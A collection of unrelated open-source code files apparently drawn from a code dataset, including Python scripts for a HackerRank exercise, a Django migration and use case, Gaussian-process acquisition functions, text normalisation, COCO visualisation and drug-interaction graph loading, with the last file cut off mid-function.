runner = unittest.TextTestRunner(verbosity=args.verbose)
result = runner.run(suite)
return result.wasSuccessful()
if __name__ == "__main__":
# NOTE: True(success) -> 0, False(fail) -> 1
exit(not main())
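# Example invocations (illustrative, not part of the original file):
#   python run.py                          # discover and run all test*.py next to this file
#   python run.py -p "check_*.py"          # use a custom discovery pattern
#   python run.py -vvv module.TestCase     # run one test case with debug logging enabled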
| 2.921875
| 3
|
exercises/python/data-types/basic/nested-list.py
|
rogeriosantosf/hacker-rank-profile
| 0
|
12783887
|
<filename>exercises/python/data-types/basic/nested-list.py
# Given the names and grades for each student in a class of students,
# store them in a nested list and print the name(s) of any student(s)
# having the second lowest grade.
# Note: If there are multiple students with the second lowest grade,
# order their names alphabetically and print each name on a new line.
# Sample Input:
# 5
# Harry
# 37.21
# Berry
# 37.21
# Tina
# 37.2
# Sample Output:
# Berry
# Harry
if __name__ == '__main__':
students = []
for _ in range(int(input())):
name = input()
score = float(input())
students.append([name, score])
students = sorted(students, key=lambda student: student[1])
lowest_grade = students[0][1]
second_lowest_grade = None
second_lowest_names = []
for i in range(len(students)):
if students[i][1] > lowest_grade:
            if second_lowest_grade is None:
second_lowest_grade = students[i][1]
second_lowest_names.append(students[i][0])
elif students[i][1] == second_lowest_grade:
second_lowest_names.append(students[i][0])
second_lowest_names.sort()
for name in second_lowest_names:
print(name)
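    # A more compact equivalent (illustrative, assumes at least two distinct grades exist):
    #   second_lowest = sorted({score for _, score in students})[1]
    #   print(*sorted(name for name, score in students if score == second_lowest), sep='\n')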
| 4.25
| 4
|
pepper_snp/modules/python/MakeImages.py
|
Samteymoori/pepper
| 0
|
12783888
|
import os
from pepper_snp.modules.python.ImageGenerationUI import UserInterfaceSupport
def make_images(bam_file, draft_file, region, output_path, total_threads, downsample_rate):
output_dir = UserInterfaceSupport.handle_output_directory(os.path.abspath(output_path))
chr_list, bed_list = UserInterfaceSupport.get_chromosome_list(region, draft_file, bam_file, region_bed=None)
UserInterfaceSupport.chromosome_level_parallelization(chr_list=chr_list,
bam_file=bam_file,
draft_file=draft_file,
truth_bam_h1=None,
truth_bam_h2=None,
output_path=output_dir,
total_threads=total_threads,
realignment_flag=False,
train_mode=False,
downsample_rate=downsample_rate,
bed_list=None)
def make_train_images(bam_file, draft_file, truth_bam_h1, truth_bam_h2, region, region_bed, output_path, total_threads, downsample_rate):
output_dir = UserInterfaceSupport.handle_output_directory(os.path.abspath(output_path))
chr_list, bed_list_dictionary = UserInterfaceSupport.get_chromosome_list(region, draft_file, bam_file, region_bed=region_bed)
UserInterfaceSupport.chromosome_level_parallelization(chr_list=chr_list,
bam_file=bam_file,
draft_file=draft_file,
truth_bam_h1=truth_bam_h1,
truth_bam_h2=truth_bam_h2,
output_path=output_dir,
total_threads=total_threads,
realignment_flag=False,
train_mode=True,
downsample_rate=downsample_rate,
bed_list=bed_list_dictionary)
| 2.234375
| 2
|
terminusdb_client/woqldataframe/__init__.py
|
KarenImmanuel/terminusdb-client-python
| 1
|
12783889
|
<gh_stars>1-10
from .woqlDataframe import ( # noqa
EmptyException,
extract_column,
extract_header,
query_to_df,
result_to_df,
type_map,
type_value_map,
)
| 1.28125
| 1
|
react_front_end/src/tools/copy-layout.py
|
benthomasson/performance_test
| 1
|
12783890
|
<gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2018 <NAME>
"""
Usage:
copy-layout [options] <from> <to>
Options:
-h, --help Show this page
--debug Show debug logging
--verbose Show verbose logging
"""
from docopt import docopt
import logging
import sys
import yaml
logger = logging.getLogger('copy-layout')
def main(args=None):
if args is None:
args = sys.argv[1:]
parsed_args = docopt(__doc__, args)
if parsed_args['--debug']:
logging.basicConfig(level=logging.DEBUG)
elif parsed_args['--verbose']:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig(level=logging.WARNING)
    with open(parsed_args['<from>']) as f:
        from_fsm = yaml.safe_load(f.read())
    with open(parsed_args['<to>']) as f:
        to_fsm = yaml.safe_load(f.read())
to_states = {x['label']: x for x in to_fsm.get('states', [])}
to_fsm['name'] = from_fsm.get('name', '')
to_fsm['finite_state_machine_id'] = from_fsm.get(
'finite_state_machine_id', '')
to_fsm['diagram_id'] = from_fsm.get('diagram_id', '')
for state in from_fsm.get('states', []):
to_states.get(state['label'], {})['x'] = state.get('x', 0)
to_states.get(state['label'], {})['y'] = state.get('y', 0)
with open(parsed_args['<to>'], 'w') as f:
f.write(yaml.safe_dump(to_fsm, default_flow_style=False))
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| 2.296875
| 2
|
bluebottle/events/migrations/0015_auto_20200226_0838.py
|
terrameijar/bluebottle
| 10
|
12783891
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.15 on 2020-02-26 07:38
from __future__ import unicode_literals
from datetime import datetime
from timezonefinder import TimezoneFinder
import pytz
from django.db import migrations
from django.utils import timezone
tf = TimezoneFinder()
def set_timezone(apps, schema_editor):
Event = apps.get_model('events', 'Event')
for event in Event.objects.filter(start__isnull=False, location__isnull=False):
tz_name = tf.timezone_at(
lng=event.location.position.x,
lat=event.location.position.y
)
tz = pytz.timezone(tz_name)
start = event.start.astimezone(timezone.get_current_timezone())
event.start = tz.localize(
datetime(
start.year,
start.month,
start.day,
start.hour,
start.minute,
)
)
event.save()
class Migration(migrations.Migration):
dependencies = [
('events', '0014_auto_20200217_1107'),
]
operations = [
migrations.RunPython(set_timezone)
]
| 2.0625
| 2
|
MFGPextreme/core/acquisitions.py
|
umbrellagong/MFGPextreme
| 1
|
12783892
|
import numpy as np
from scipy.linalg import cho_solve, inv
from scipy.stats import norm
from scipy.interpolate import InterpolatedUnivariateSpline
from sklearn.mixture import GaussianMixture as GMM
from .utils import custom_KDE
import time
class Acq(object):
'''
The base acq class.
'''
def __init__(self, inputs):
self.inputs = inputs
def compute_value(self, x):
raise NotImplementedError
def update_prior_search(self, model):
raise NotImplementedError
class AcqLW(Acq):
''' Select the next sample for estimating extreme event statistics.
This acquisition can be used in both single and multi-fidelity contexts.
parameters:
---------
inputs: instance of Input class
Input of the problem including pdf information and a sampling method.
ll_type: string
the type of the weights, must be one of
(1) rare: w(x)=p(x)/p(y(x))
(2) extreme: w(x)=p(x)|y(x)-z|^n
(3) plain: no weights
(4) input: w(x)=p(x)
load_pts: bool
whether load the input samples from a txt file
ll_kwargs: key words for extreme ll_type
attributes:
----------
model: instance of gpr.GaussianProcessRegressor
The surrogate model based on current dataset
DX: array
The inputs of current samples
gmm: instance of sklearn.GMM
The gmm to approximate likelihood, including gmm.means_,
gmm.covariances_, and gmm.scores_.
'''
def __init__(self, inputs, ll_type='rare', load_pts=False, **ll_kwargs):
self.inputs = inputs
self.ll_type = ll_type
self.load_pts = load_pts
self.ll_kwargs = ll_kwargs
if load_pts:
smpl = np.loadtxt('map_samples.txt')
self.pts = smpl[:,0:-1] # mc points
self.fx = smpl[:,-1] # pdf of mc points
def compute_value_tf_cost(self, pos, fidelity, cost):
''' Compute the benefit per cost of adding a sample (pos, fidelity)
'''
x = np.append(pos, fidelity)
value, gradient = self.compute_value(x)
return value/cost, gradient/cost
def compute_value(self, x):
''' Compute the benefit of adding a sample x
For single fidelity, x = pos, while for multi-fidelity,
x = {pos, fidelity}.
'''
x = np.atleast_2d(x)
integral, integral_derivative = self.compute_integral(x)
cov, cov_deriv = self.model.post_cov(x)
value = (integral / cov).item()
gradient = 1/cov**2 * (cov*integral_derivative - integral*cov_deriv)
gradient = gradient.reshape(-1)
return -value, -gradient
def compute_integral(self, x):
''' \int cov^2(f_i(pos), f_h(x'))*w(x')dx', x = {pos, i=fidelity}
Eq.(15) in paper.
and
d \int cov^2(f_i(pos), f_h(x'))*w(x')dx' d pos,
x = {pos, i=fidelity} Eq.(49) in paper.
'''
# compute value
kernel = self.model.kernel_
integral = self.compute_mixed_kappa(x,x)
alpha = cho_solve((self.model.L_, True), kernel(self.X, x))
integral += alpha.T.dot(np.dot(self.kappaXX, alpha)
- 2*self.compute_mixed_kappa(self.X, x))
# compute derivative
term1 = 2*self.compute_mixed_dkappa_dx(x,x)
dalpha_dx = cho_solve((self.model.L_, True),
kernel.gradient_x(x, self.X))
term2 = 2 * alpha.T.dot(np.dot(self.kappaXX, dalpha_dx))
term3 = 2 * alpha.T.dot(self.compute_mixed_dkappa_dx(x,self.X))
term3 += 2 * self.compute_mixed_kappa(x, self.X).dot(dalpha_dx)
return integral, term1 + term2 - term3
def update_prior_search(self, model):
''' Update the model(gpr), data(X), compute the gmm of weights and
kappa(X,X).
'''
self.model = model
self.X = self.model.X_train_
# generate GMM approximation of the likelihood
self._prepare_likelihood(self.ll_type, **self.ll_kwargs)
# constant for all hypothetical point
self.kappaXX = self.compute_mixed_kappa(self.X, self.X)
def compute_mixed_kappa(self, X1, X2):
''' compute averaged kappa w.r.t gmm components.
Eq. (18) in paper. The 'G' function relies on kernel properties.
'''
kernel = self.model.kernel_
mixed_kappa = 0
for i in range(self.gmm.n_components): # the number of gmm component
mixed_kappa += self.gmm.weights_[i] * kernel.intKKNorm(X1, X2,
self.gmm.means_[i],
self.gmm.covariances_[i])
return mixed_kappa
def compute_mixed_dkappa_dx(self, x, X):
''' Compute the averaged kappa derivatives.
Eq.(53) in paper.
'''
kernel = self.model.kernel_
mixed_kappa = 0
for i in range(self.gmm.n_components):
mixed_kappa += self.gmm.weights_[i] * kernel.dintKKNorm_dx(x, X,
self.gmm.means_[i],
self.gmm.covariances_[i])
return mixed_kappa
def _prepare_likelihood(self, ll_type, n_components=2, power=6,
center=0, depressed_side=None):
'''Compute gmm components of w(x').
'''
if self.load_pts:
pts = self.pts
fx = self.fx
n_samples = pts.shape[0]
else:
if self.inputs.dim <= 2:
n_samples = int(1e5)
else:
n_samples = int(1e6)
pts = self.inputs.sampling(n_samples) # input-samples
fx = self.inputs.pdf(pts) # weights
if ll_type =='input':
w_raw = fx
elif ll_type == 'plain':
w_raw = 1
else:
# compute the mean prediction for input-samples
if self.X.shape[1] != self.inputs.dim:
aug_pts = np.concatenate((pts, [[1]] * n_samples), axis = 1)
else:
aug_pts = pts
if ll_type == 'rare':
if n_samples > 4*1e5:
aug_pts_list = np.array_split(aug_pts, 10)
mu = np.empty(0)
for iii in range(10):
mu = np.concatenate((mu,
self.model.predict(aug_pts_list[iii]).flatten()))
else:
mu = self.model.predict(aug_pts).flatten()
x, y = custom_KDE(mu, weights=fx).evaluate()
self.fy_interp = InterpolatedUnivariateSpline(x, y, k=1)
w_raw = fx/self.fy_interp(mu)
elif ll_type == 'extreme':
mu = self.model.predict(aug_pts).flatten()
            if center == 'mean':
                # np.average takes weights as a keyword; the second positional arg is axis
                center = np.average(mu, weights=fx)
if depressed_side == 'negative':
w_raw = fx*abs(mu - center) ** (power*np.sign(mu - center))
elif depressed_side == 'positive':
w_raw = fx*abs(mu - center) ** (-power*np.sign(mu - center))
else:
w_raw = fx*abs(mu - center)**power
elif ll_type == 'failure':
# P(X)(1-P(X)) * p(X) / var(X)
mu, std = self.model.predict(aug_pts, return_std=True)
# failure probability as a Bernoulli RV
p = norm.cdf(mu.flatten()/std.flatten())
vb = p*(1-p) # var of the Bernoulli
vf = std**2 # var of the predictions
w_raw = vb * fx / vf
self.gmm = self._fit_gmm(pts, w_raw, n_components)
return self
@staticmethod
def _fit_gmm(pts, w_raw, n_components):
'''Fit gmm with weighted samples
'''
sca = np.sum(w_raw)
rng = np.random.default_rng()
aa = rng.choice(pts, size=50000, p=w_raw/sca)
gmm = GMM(n_components=n_components, covariance_type="full")
gmm = gmm.fit(X=aa)
return gmm
| 2.21875
| 2
|
django_business_logic/django_business_logic/apps/posts/internal_services/usecases.py
|
gonzaloamadio/django_business_logic
| 2
|
12783893
|
# -*- coding: utf-8 -*-
"""Concentrate the heavy business logic of the operations of an application.
It knows all Models that should be part of the flow and knows
the API/services of those models. It also orchestrate all the side-effects
and therefore can make the use of other use cases/services.
"""
from django.utils.translation import gettext as _
from payments_comissions.models import PaymentComission
from posts.models import Job
from posts_areas.models import PostArea
from tektank.internal_services.use_case_interface import UseCaseInterface
from tektank.libs_project.helpers import slug_generator
from .errors import InvalidCategories, InvalidDateOrder
from .interfaces import JobRepositoryInterface
class CreateJob(UseCaseInterface):
"""Create Job service.
Service layer for the creation of a Job. Here we are going to do all
validations and side effects. We are going to always use this service
instead of calling the Models create method directly.
We combine validations here, and validators in the model itself.
Input:
Parameters of Job model, i.e. its fields.
repository : A class that will operate against the DB,
or any other source to get/put information.
Raises:
InvalidCategories
InvalidDateOrder
Returns:
Instance of Job created.
"""
def __init__(
self,
repository: JobRepositoryInterface,
title,
email,
date_start,
date_end,
amount_to_pay,
avatar=None,
company=None,
city=None,
state=None,
country=None,
postal_code=None,
post_category=None,
post_subcategory=None,
address=None,
phone=None,
cellphone=None,
description=None,
terms=None,
deleted=False,
slug=None,
):
"""
We can instantiate like
CreateJob('title','<EMAIL>',date1,date2,
** { "address" : " 123 street ","description ":"This is a descr"}
        So we provide the mandatory fields, plus any optional ones we want to set.
        Fields slug and payment_comission do not appear because they are
        set by us; they are not user input.
"""
# -- Set the internal state of the model for the operation
# The fields listed here, should match with the ones defined in the
# model definition. And also with only one _ before the field name.
self._title = title
self._email = email
self._date_start = date_start
self._date_end = date_end
self._amount_to_pay = amount_to_pay
self._avatar = avatar
self._company = company
self._city = city
self._state = state
self._country = country
self._postal_code = postal_code
self._post_category = post_category
self._post_subcategory = post_subcategory
self._address = address
self._phone = phone
self._cellphone = cellphone
self._description = description
self._terms = terms
# Forces None, as we set them
self._slug = None
self._payment_comission = None
self._deleted = deleted
# ----- Other objects ----- #
self.__obj = None
self.__repository = repository
# A list of keys defined in the model. If model is modified, we should
# also modify this.
self.__model_keys = [
'title',
'email',
'date_start',
'date_end',
'amount_to_pay',
'avatar',
'company',
'city',
'state',
'country',
'postal_code',
'post_category',
'post_subcategory',
'address',
'phone',
'cellphone',
'description',
'terms',
'slug',
'deleted',
'payment_comission',
]
@property
def repository(self) -> JobRepositoryInterface:
"""Return the respository (adapter) used."""
return self.__repository
def execute(self) -> Job:
"""Main operation, the one that be executed by external code. This
operation will condense the rest. Will execute side effects, and
all required operations in order.
"""
self._strip_data()
# Create an instance of Job, and save it into self.__obj
self._factory()
self.is_valid()
self.__obj.slug = self._generate_slug( # noqa: T484
self.__obj.id, self.__obj.title, # noqa: T484
)
self.__obj.payment_comission = self._generate_payment_comission( # noqa: T484
self.__obj.amount_to_pay, # noqa: T484
)
self.__repository.save(self.__obj)
return self.__obj
    def _strip_data(self):
        """Clean fields. For example, delete trailing spaces."""
        # These names must match the attributes set in __init__ (underscore-prefixed);
        # otherwise getattr silently returns None and nothing gets stripped.
        fields = [
            "_title",
            "_email",
            "_address",
            "_phone",
            "_cellphone",
        ]
        for field in fields:
            value = getattr(self, field, None)
            if value:
                setattr(self, field, value.strip())
def is_valid(self):
"""Public method to allow clients of this object to validate the data even before to execute the use case.
To use it, create an instance of the class with the values desired.
And execute it.
Returns:
True or False
Raises:
ValidationError, InvalidDateOrder, InvalidCategories
"""
# ## Check date order
if self._date_end and self._date_start and self._date_end <= self._date_start:
raise InvalidDateOrder(_("Start date should be before end date"))
# ## Check categories match.
        # TODO: This should not be necessary, but in the admin the
        # dropdown menus for selecting categories are not filtered correctly when selecting
        # the parent category, so we need to do it here.
# TODO: Send ID instead of name for better lookup
# TODO: This logic would go inside posts_category services
if self._post_category:
assert isinstance(
self._post_category, str
), "Category name should be a string"
if self._post_subcategory:
assert isinstance(
self._post_subcategory, str
), "Subcategory name should be a string"
# If user selected both categories, check that the parent is the correct
# If only subcategory selected, fill the right parent.
# If only category, do nothing.
cat = (
PostArea.objects.find_by_name(self._post_category)
if self._post_category
else None
)
subcat = (
PostArea.objects.find_by_name(self._post_subcategory)
if self._post_subcategory
else None
)
if subcat:
if cat and subcat.parent != cat:
raise InvalidCategories(cat.name, subcat.name)
else:
self._post_category = subcat.parent.name
# Here at the end, as before this, we were cleaning and validating all
# fields, so it has sense that at this point, the model will be in the
# final state.
# If object is not stored locally, do it.
if not self.__obj:
self._factory()
# ## Execute programatically model validations. Raises validation error.
self.__obj.full_clean()
return True
def _generate_slug(self, uuid, title):
"""Generate slug for the instance."""
return slug_generator(uuid, title)
def _generate_payment_comission(self, amount_to_pay):
"""Assign an instance to PaymentComission related to this model.
This assignment will later dictated how we are going to charge this
job.
The rules of how we are going to calculate this, are done by us.
"""
return PaymentComission.assign_payment_comission(amount_to_pay)
def _factory(self):
"""Create an instance of a Job, and save it into self.__obj."""
# Check if it is a field in the model # TODO do it better?
# Remove _ from keys, so we pass correct arguments to create,
# and leave only values that are not None.
def process(s):
if s[0] == '_' and s[1] != '_' and s[1:] in self.__model_keys:
return s[1:]
params = {
process(k): v
for k, v in self.__dict__.items()
if v is not None and process(k)
}
self.__obj = self.__repository.factory(**params)
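# Illustrative usage sketch (hypothetical values; `repository` is any object implementing
# JobRepositoryInterface):
#   use_case = CreateJob(repository, title='Backend developer', email='<EMAIL>',
#                        date_start=start, date_end=end, amount_to_pay=1000)
#   job = use_case.execute()  # validates, generates slug/comission, persists and returns the Job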
| 2.625
| 3
|
data/normalize/normalize.py
|
18645956947/TripleIE
| 0
|
12783894
|
<gh_stars>0
import re
with open('question.txt', 'r', encoding='utf-8') as f:
questions = f.readlines()
def select_question(question):
global normalize_list
    # Check whether this is a compound question joined by '和' (and); if so, split it into multiple questions
m_and_1 = re.search(r'(.*)(和)+(.*)', question)
if m_and_1:
question_list = deal_and_question(question)
return question_list
return []
# Split a compound question joined by the '和' (and) keyword into multiple questions
def deal_and_question(question):
prefix = ''
question_list = []
rule_1 = r'(总)*(农村人口|城镇人口|男性人口|女性人口|男女比例|人口|销售额|销量|营业额|利润|订单量|订单id|合同id|合同金额)+'
rule_2 = r'(总)+(农村人口|城镇人口|男性人口|女性人口|男女比例|人口|销售额|销量|营业额|利润|订单量|订单id|合同id|合同金额)+'
q_list = question.split('和')
for i, q in enumerate(q_list):
m_i = re.search(rule_1, q)
if i == 0:
if m_i:
                # Extract the common prefix shared by the split questions
prefix = q[:len(q) - len(m_i.group())]
question_0 = prefix + m_i.group()
                # Strip the '总' (total) prefix, e.g. 总人口 -> 人口
m = re.search(rule_2, question_0)
if m:
before = question_0[:len(question_0) - len(m.group())]
after = m.group().replace('总', '')
question_list.append(before + after)
else:
question_list.append(prefix + m_i.group())
else:
if m_i:
question_n = prefix + m_i.group()
                # Strip the '总' (total) prefix, e.g. 总人口 -> 人口
m = re.search(rule_2, question_n)
if m:
before = question_n[:len(question_n) - len(m.group())]
after = m.group().replace('总', '')
question_list.append(before + after)
else:
question_list.append(prefix + m_i.group())
return question_list
def replace_words(question):
    # Population-related phrasings
question = question.replace('农村的人口', '农村人口')
question = question.replace('城镇的人口', '城镇人口')
question = question.replace('男性的人口', '男性人口')
question = question.replace('女性的人口', '女性人口')
question = question.replace('多少人', '人口')
question = question.replace('人口数', '人口')
question = question.replace('人口数量', '人口')
question = question.replace('人口总数', '人口')
question = question.replace('人数', '人口')
question = question.replace('人的数量', '人口')
question = question.replace('人的总数', '人口')
question = question.replace('人口的数量', '人口')
question = question.replace('销售数量', '销量')
question = question.replace('销售的数量', '销量')
question = question.replace('销售数', '销量')
question = question.replace('订单数量', '订单量')
question = question.replace('订单的数量', '订单量')
question = question.replace('负面舆情数量', '负面舆情数')
question = question.replace('负面舆情的数量', '负面舆情数')
question = question.replace('评论数量', '评论数')
question = question.replace('评论的数量', '评论数')
question = question.replace('点赞数量', '点赞量')
question = question.replace('点赞的数量', '点赞量')
question = question.replace('阅读数量', '阅读量')
question = question.replace('阅读的数量', '阅读量')
question = question.replace('转发数数量', '转发数')
question = question.replace('转发的数量', '转发数')
question = question.replace('有多少', '')
question = question.replace('有哪些', '')
question = question.replace('哪些', '')
question = question.replace('那些', '')
question = question.replace('哪个', '')
question = question.replace('那个', '')
question = question.replace('所有', '')
question = question.replace('打开', '')
question = question.replace('查找', '')
question = question.replace('查询', '')
question = question.replace('找出', '')
question = question.replace('查查', '')
question = question.replace('查看', '')
question = question.replace('看看', '')
question = question.replace('筛选', '')
question = question.replace('选择', '')
question = question.replace('选出', '')
question = question.replace('筛选出', '')
question = question.replace('的', '有')
return question
normalize_list = []
for question in questions:
question_format = question.strip()
question_format = replace_words(question_format)
q_list = select_question(question_format)
if len(q_list):
for q in q_list:
normalize_list.append(q)
else:
normalize_list.append(question_format)
with open('normalize.txt', 'a+', encoding='utf-8') as f:
for line in normalize_list:
line = line.replace('总', '')
f.write(line + '\n')
| 2.890625
| 3
|
cocojson/run/viz.py
|
TeyrCrimson/cocojson
| 0
|
12783895
|
<reponame>TeyrCrimson/cocojson
import argparse
from cocojson.tools import viz
def main():
ap = argparse.ArgumentParser()
ap.add_argument('json', help='Path to coco json')
ap.add_argument('imgroot', help='Path to img root')
ap.add_argument('--outdir', help='Path to output dir, leave out to not write out', type=str, nargs='?', const=True)
ap.add_argument('--sample', help='Num of imgs to sample, leave this flag out to process all.', type=int)
ap.add_argument('--show', help='To imshow', action='store_true')
args = ap.parse_args()
viz(args.json, args.imgroot, outdir=args.outdir, sample_k=args.sample, show=args.show)
if __name__ == '__main__':
main()
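# Example invocation (illustrative, with hypothetical paths):
#   python viz.py annotations.json images/ --outdir viz_out --sample 20 --show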
| 2.546875
| 3
|
app/auth/forms.py
|
chenke91/ihaveablog
| 0
|
12783896
|
#coding=utf-8
from flask.ext.wtf import Form
from wtforms import StringField, SubmitField, PasswordField
from wtforms.validators import Required, Email, Length, EqualTo
from app.models import User
class RegisterForm(Form):
username = StringField('用户名', validators=[Required('请输入用户名')])
email = StringField('邮箱',
validators=[Required('请输入邮箱地址'), Email('邮箱格式不正确')])
password = PasswordField('密码',
validators=[Required('请输入密码'), Length(6, 20, '密码长度为6~20'),
EqualTo('password2', '两次输入不一致')])
password2 = PasswordField('重复密码',
validators=[Required('请重复密码'), Length(6, 20, '密码长度为6~20')])
submit = SubmitField('注册')
def validate_username(self, field):
if User.query.filter_by(username=field.data).count():
raise ValueError('用户名已存在')
def validate_email(self, field):
if User.query.filter_by(email=field.data).count():
raise ValueError('邮箱已注册')
class LoginFrom(Form):
email = StringField('邮箱',
validators=[Required('请输入邮箱地址'), Email('邮箱格式不正确')])
password = PasswordField('密码',
validators=[Required('请输入密码'), Length(6, 20, '密码长度为6~20')])
submit = SubmitField('登陆')
| 2.875
| 3
|
solutions/official/utils.py
|
kurazu/pycon_quiz
| 0
|
12783897
|
from functools import wraps
def cached(func):
cache = {}
@wraps(func)
def cached_wrapper(*args):
if args not in cache:
cache[args] = func(*args)
return cache[args]
return cached_wrapper
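# Illustrative usage (not part of the original module): fib becomes memoized, so each
# sub-problem is computed once instead of exponentially many times.
if __name__ == "__main__":
    @cached
    def fib(n):
        return n if n < 2 else fib(n - 1) + fib(n - 2)

    assert fib(30) == 832040  # fast, thanks to the cache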
| 2.921875
| 3
|
utils/data/load_raw_data.py
|
codeKgu/BiLevel-Graph-Neural-Network
| 20
|
12783898
|
<reponame>codeKgu/BiLevel-Graph-Neural-Network
from collections import defaultdict
from glob import glob
from os.path import join, basename
import networkx as nx
import numpy as np
from scipy.sparse import csr_matrix
from tqdm import tqdm
from utils.data.dataset import BiGNNDataset
from utils.data.graph import Graph, GraphPair
from utils.util import get_data_path, load, sorted_nicely
def load_raw_interaction_data(name, natts, eatts, tvt):
if 'drugbank' in name:
dir_name = 'DrugBank'
drugbank_dir = join(get_data_path(), dir_name)
interaction_dir = join(drugbank_dir, 'ddi_data')
graph_data = load(join(drugbank_dir, 'klepto', 'graph_data.klepto'))
fname_to_gid_func = lambda fname: int(fname[2:])
interaction_fname = 'ddi_snap.tsv'
parse_edge_func = parse_edges_biosnap
data_dir = join(interaction_dir, 'drugs_snap')
if 'small' in name:
data_dir = join(interaction_dir, 'drugs_small')
interaction_file_path = join(interaction_dir, interaction_fname)
edge_types_edge_list, nodes = get_interaction_edgelist(
interaction_file_path,
parse_edge_func,
False,
fname_to_gid_func)
elif 'drugcombo' in name:
dir_name = 'DrugCombo'
drugcombo_dir = join(get_data_path(), dir_name)
graph_data = load(join(drugcombo_dir, "klepto", 'graph_data.klepto'))
data_dir = drugcombo_dir
interaction_dir = join(drugcombo_dir, 'ddi_data')
interaction_file_path = join(interaction_dir, 'Syner&Antag_voting.csv')
drugname_to_cid = load(join(drugcombo_dir, 'klepto', 'drug_name_to_cid'))
edge_to_gid_func = lambda x: int(drugname_to_cid[x.lower()][4:])
fname_to_gid_func = lambda x: int(x[4:])
num_pairs_synergy_antagonism = count_pairs_synergy_antagonism(
interaction_file_path)
edge_types_edge_list, nodes = get_interaction_edgelist(
interaction_file_path,
parse_edges_drugcombo,
True,
edge_to_gid_func,
skip_first_line=True,
num_pairs_synergy_antagonism=num_pairs_synergy_antagonism)
else:
raise NotImplementedError
graphs = iterate_get_graphs(data_dir, graph_data, nodes,
fname_to_gid_func, natts=natts)
pairs, graph_ids, edge_types_edge_list_filtered = get_graph_pairs(
edge_types_edge_list, graphs)
hyper_edge_labels = {'interaction': 1, 'no_interaction': 0}
sparse_node_feat, gid_to_idx = get_molecular_node_feats(graph_data,
graph_ids,
fname_to_gid_func)
if 'drugcombo' in name:
for pair in pairs.values():
if next(iter(pair.edge_types)) == 'antagonism':
pair.true_label = 2
hyper_edge_labels = {'antagonism': 2, 'synergy': 1, 'no_interaction': 0}
graphs = [graphs[gid] for gid in sorted(graph_ids)]
return BiGNNDataset(name, graphs, natts, hyper_edge_labels, eatts,
pairs, tvt, sparse_node_feat)
def get_molecular_node_feats(graph_data, gids, fname_to_gid_func):
gid_to_idx = {gid: i for i, gid in enumerate(sorted(list(gids)))}
gid_graph_data = {fname_to_gid_func(id): g_data for id, g_data in graph_data.items()}
mats = {}
for feat_shape in list(gid_graph_data.values())[0]['drug_feat']:
mat = np.zeros((len(gids), int(feat_shape)))
for gid in gids:
mat[gid_to_idx[gid]] = gid_graph_data[gid]["drug_feat"][feat_shape]
mats[feat_shape] = csr_matrix(mat)
return mats, gid_to_idx
def get_interaction_edgelist(file_path, parse_edges_func, has_interaction_eatts,
edge_to_gid_func, skip_first_line=False, **kwargs):
# assume each line in file is an edge, parse it using parse_edge_func
edge_types_edge_list = defaultdict(lambda: defaultdict(list))
nodes = set()
skipped = set()
with open(file_path, 'r') as f:
readlines = f.readlines() if not skip_first_line else list(f.readlines())[1:]
for i, line in enumerate(readlines):
edge, edge_type = parse_edges_func(line, **kwargs)
if edge:
try:
e1 = edge_to_gid_func(edge[0])
e2 = edge_to_gid_func(edge[1])
except KeyError as e:
skipped.add(str(e))
continue
if has_interaction_eatts and edge_type:
edge_types_edge_list[edge_type][e1].append(e2)
else:
edge_types_edge_list['default'][e1].append(e2)
nodes.add(e1)
nodes.add(e2)
print("number skipped: ", len(skipped))
return edge_types_edge_list, nodes
def parse_edges_biosnap(line):
return line.rstrip('\n').split('\t'), None
def count_pairs_synergy_antagonism(file_path):
count_syn_ant = defaultdict(lambda: defaultdict(int))
with open(file_path, 'r') as f:
for i, line in enumerate(list(f.readlines())[1:]):
line = line.split(',')
count_syn_ant[tuple(sorted([line[1], line[2]]))][line[-1]] += 1
return count_syn_ant
def parse_edges_drugcombo(line, **kwargs):
label_counts = kwargs['num_pairs_synergy_antagonism']
line = line.split(',')
drugs = [line[1], line[2]]
    # Sort the pair in both lookups so synergy and antagonism counts refer to the same key
    if label_counts[tuple(sorted(drugs))]['synergy\n']\
            >= label_counts[tuple(sorted(drugs))]['antagonism\n']:
label = 'synergy'
else:
label = 'antagonism'
return drugs, label
def get_graph_pairs(edge_types_edge_list, graphs):
graph_pairs = {}
no_graph_structures = set()
final_graphs = set()
edge_types_edge_list_filtered = defaultdict(lambda: defaultdict(set))
for edge_type, edge_list in tqdm(edge_types_edge_list.items()):
for gid1, gid2s in edge_list.items():
if gid1 not in graphs.keys():
no_graph_structures.add(gid1)
continue
graph1 = graphs[gid1]
for gid2 in gid2s:
gid_pair = tuple(sorted([gid1, gid2]))
if gid_pair not in graph_pairs.keys():
if gid2 not in graphs.keys():
no_graph_structures.add(gid2)
continue
graph2 = graphs[gid2]
final_graphs.add(gid1)
final_graphs.add(gid2)
graph_pairs[gid_pair] = GraphPair(true_label=1,
g1=graph1, g2=graph2,
edge_types=set([edge_type]))
else:
graph_pairs[gid_pair].edge_types.add(edge_type)
edge_types_edge_list_filtered[edge_type][gid1].add(gid2)
return graph_pairs, final_graphs, edge_types_edge_list_filtered
def iterate_get_graphs(dir, graph_data, nodes, fname_to_gid_func,
check_connected=False, natts=(), eatts=()):
graphs = {}
not_connected = []
no_edges = []
graphs_not_in_edge_list = []
for file in tqdm(sorted_nicely(glob(join(dir, '*.gexf')))):
fname = basename(file).split('.')[0]
gid = fname_to_gid_func(fname)
if gid not in nodes:
graphs_not_in_edge_list.append(fname)
continue
g = nx.read_gexf(file)
g.graph['gid'] = gid
if not nx.is_connected(g):
msg = '{} not connected'.format(gid)
if check_connected:
raise ValueError(msg)
else:
not_connected.append(fname)
# assumes default node mapping to convert_node_labels_to_integers
nlist = sorted(g.nodes())
g.graph['node_label_mapping'] = dict(zip(nlist,
range(0, g.number_of_nodes())))
add_graph_data_to_nxgraph(g, graph_data[fname])
g = nx.convert_node_labels_to_integers(g, ordering="sorted")
if len(g.edges) == 0:
no_edges.append(fname)
continue
# # Must use sorted_nicely because otherwise may result in:
# # ['0', '1', '10', '2', '3', '4', '5', '6', '7', '8', '9'].
# # Be very cautious on sorting a list of strings
# # which are supposed to be integers.
for i, (n, ndata) in enumerate(sorted(g.nodes(data=True))):
BiGNNDataset.assert_valid_nid(n, g)
assert i == n
remove_entries_from_dict(ndata, natts)
